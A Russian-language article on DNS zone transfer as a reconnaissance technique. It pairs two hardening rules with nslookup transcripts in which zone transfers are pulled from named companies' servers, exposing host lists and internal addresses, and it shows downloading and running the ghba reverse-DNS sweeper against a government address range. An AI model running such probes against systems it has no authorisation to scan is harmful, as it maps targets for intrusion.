В этой статье пойдет речь о зонах DNS, передаче зоны DNS и информации, которую злоумышленник может извлечь из этой операции. Также будут рассмотрены конкретные примеры передачи зоны DNS на реальных сайтах. Передача зоны DNS является, пожалуй, самым простым и популярным методом сбора информации обо всех членах какого-либо домена. Файл зоны DNS, как правило, содержит всю информацию, касающуюся имен, входящих домен. Зачастую также этот файл содержит детали внутренней непубличной сети и другую информацию, которая может быть использована для составления точной структуры целевой сети.
Немного базовой теории. Файл зоны является главным хранилищем информации о домене. В случае добавления поддомена в домен, использующийся для оригинального файла зоны, новый поддомен может стать частью этой же зоны, а может быть делегирован в новую зону, созданную для его поддержки. Многие организации в целях балансировки нагрузки и повышения отказоустойчивости используют не один, а два или более DNS-серверов. Главный DNS-сервер называется первичным сервером, остальные – вторичными. Так как запрос имени может прийти к любому серверу, то информация на всех серверах должна быть идентична. Для этого вторичные серверы при старте или по расписанию посылают запрос первичному серверу на предмет наличия изменений в файле зоны. Если со времени последней синхронизации на первичном сервере произошли изменения в данных зоны, то вторичный сервер инициирует передачу зоны DNS.
Из приведенной выше базовой информации можно сделать два простых вывода:
1. Делегируйте непубличные поддомены в отдельную зону, недоступную из вне.
2. Не осуществляйте передачу зоны DNS не авторизованным серверам.
Соблюдение этих двух нехитрых правил не даст злоумышленнику возможности одним запросом получить полную картину сети и найти в ней уязвимые точки. Как будет видно далее, даже крупные компании, тратящие немалые деньги на безопасность, не всегда их выполняют.
Программы, которые могут инициировать передачу зоны DNS, существуют как под Windows-платформу, так и под Unix-like-системы. Я для этих целей буду использовать программу nslookup, входящую в дистрибутив большинства операционных систем. Другие программы, которые могут произвести передачу зоны DNS:
1. Sam Spade – клиент под Windows с графическим интерфейсом.
2. Host – включается во все Unix-like-дистрибутивы.
3. Dig — включается во все Unix-like-дистрибутивы.
Используя nslookup в интерактивном режиме, можно выполнить передачу зоны DNS, присоединившись к соответствующему DNS-серверу. Рассмотрим конкретные примеры. Посмотрим, какую информацию мы сможем получить от такой крупной компании, как ОАО МТС. Для начала определим DNS-серверы:
Microsoft Windows [версия 6.0.6000]
(C) Корпорация "Майкрософт", 2006. Все права защищены
C:\Windows\system32>nslookup
Default Server: ns.masterhost.ru
Address: 192.168.0.155:53
> set querytype=any
> mts.ru
Server: ns.masterhost.ru
Address: 192.168.0.155:53
Неофициальный ответ:
mts.ru
primary name server = ns.mts.ru
responsible mail addr = mail.mts.ru
serial = 2007022000
refresh = 10800 (3 hours)
retry = 1800 (30 mins)
expire = 604800 (7 days)
default TTL = 86400 (1 day)
mts.ru text =
"v=spf1 ip4:194.54.148.0/24 ip4:81.211.47.0/24 ip4:213.87.4.0/24 ip4:212
.44.140.0/24 ip4:194.54.148.0/22 mx ~all"
mts.ru MX preference = 10, mail exchanger = mx.mts.ru
mts.ru MX preference = 20, mail exchanger = mx2.mts.ru
mts.ru MX preference = 30, mail exchanger = mx3.mts.ru
mts.ru internet address = 81.176.66.38
mts.ru nameserver = ns.mts.ru
mts.ru nameserver = ns2.mts.ru
mts.ru nameserver = ns2.mts.ru
mts.ru nameserver = ns.mts.ru
mx.mts.ru internet address = 81.211.47.1
mx2.mts.ru internet address = 194.54.148.6
mx3.mts.ru internet address = 194.54.148.6
>
Итак, имя первичного DNS-сервера – ns.mts.ru, вторичного – ns2.mts.ru. Далее непосредственно выполняем передачу зоны DNS.
> server ns.mts.ru
Default Server: ns.mts.ru
Address: 81.211.47.1
> ls -d mts.ru
ls: connect: Result too large
*** Can't list domain mts.ru: Unspecified error
DNS-сервер отклонил передачу зоны mts.ru на данный компьютер. Если это
ошибка, проверьте параметры безопасности передачи зоны для mts.ru на DNS-
сервере по IP-адресу 81.211.47.1.
Как видим, сервер отклонил передачу зоны. Что ж, не будем расстраиваться, все-таки МТС — это огромная компания и вопросам безопасности там наверняка уделяют достаточно внимания. Но давайте на всякий случай проверим и вторичный сервер.
> server ns2.mts.ru
Default Server: ns2.mts.ru
Address: 212.44.140.2
> ls -d mts.ru
После ввода последней команды мы, совершенно неожиданно, вместо отказа в передаче зоны получаем список из 864 имен, входящих в домен mts.ru. Приводить весь список я не буду, ограничусь лишь несколькими записями.
dealer A 213.87.4.2
admin.kostroma A 85.113.211.3
gw-inet A 194.54.151.1
partners A 81.176.66.38
service.kuban A 217.74.241.64
vip A 81.176.66.38
Как видно даже из названий, эти данные никак не должны являться публичными. И хотя в переданном файле зоны нет информации о внутренней сети, каждый из 864 хостов представляет потенциальную мишень для злоумышленника.
Разберем еще один пример. Сайт интернет-магазина www.shop77.ru. Тут и масштабы намного меньше, и вопросам безопасности (как мы убедимся далее) уделяют гораздо меньше внимания. Определение DNS-сервера я в этом случае опущу. Он один – ns.shop77.ru. Перейду непосредственно к передаче зоны DNS.
> server ns.shop77.ru
Default Server: ns.shop77.ru
Address: 81.211.17.62
> ls -d shop77.ru
[ns.shop77.ru]
shop77.ru. SOA ns.shop77.ru root.shop77.ru. (2005022205
3600 900 3600000 3600)
shop77.ru. NS ns.shop77.ru
shop77.ru. A 81.211.17.62
shop77.ru. MX 10 mail.shop77.ru
shop77.ru. MX 20 shop77.ru
elec CNAME ns.shop77.ru
hiservice A 192.168.0.19
shop77.ru.IN NS ns.avtoreal.ru
intra CNAME ns.shop77.ru
intra1 A 192.168.0.11
localhost A 127.0.0.1
mail CNAME ns.shop77.ru
need CNAME ns.shop77.ru
ns A 81.211.17.62
shop98 A 192.168.0.19
webdb A 192.168.0.19
www CNAME ns.shop77.ru
shop77.ru. SOA ns.shop77.ru root.shop77.ru. (2005022205
3600 900 3600000 3600)
>
А вот здесь уже и внутренние подробности присутствуют. Так, мы видим, что база данных располагается по адресу 192.168.0.19, так же как и сам магазин.
На этих примерах наглядно видно, что, даже не обладая каким-то специфичным программным обеспечением и навыками, можно собрать достаточно приватной информации, если у вас плохо настроен DNS-сервер, передающий зону DNS всем, кто сделает такой запрос. И хотя сама по себе технология передачи зоны является чисто сервисной функцией DNS-серверов, она может быть использована для сбора информации злоумышленником для составления структуры целевой сети и выявления ее слабых мест.
Дальнейшее изучение структуры целевой сети включает в себя также использование техники обратного DNS-преобразования (reverse DNS sweeping). Для этого используется утилита ghba.c, существующая под Unix-like-платформы в виде исходного кода. Загрузить ее можно по адресу http://www.attrition.org/tools/other/ghba.c. Эта утилита является сканером подсетей класса B или С. С помощью нее можно получить информацию о машинах (или устройствах), которые не защищены или спрятаны, но все равно имеют связанные с ними DNS-имена. Следующий пример показывает, как скачать, собрать и использовать эту утилиту. В качестве цели будет использовано адресное пространство сайта ЦРУ www.cia.gov.
# wget http://www.attrition.org/tools/other/ghba.c
# ls
ghba.c
# cc -o ghba ghba.c
ghba.c: In function 'main':
ghba.c:105: warning: return type of 'main' is not 'int'
# ls
ghba ghba.c
# ./ghba
usage: ghba [-x] [-a] [-f ] aaa.bbb.[ccc||0].[ddd||0]
# ./ghba 198.81.129.0
Scanning Class C network 198.81.129...
198.81.129.100 => www.odci.gov
198.81.129.101 => www2.cia.gov
198.81.129.163 => ain-relay4-hme1.ucia.gov
198.81.129.193 => relay1.ucia.gov
198.81.129.194 => relay2.ucia.gov
198.81.129.195 => relay4.ucia.gov
198.81.129.222 => ex-rtr-129.ucia.gov
198.81.129.230 => res.odci.gov
Чтобы обсудить это в форуме, нажмите здесь. | 
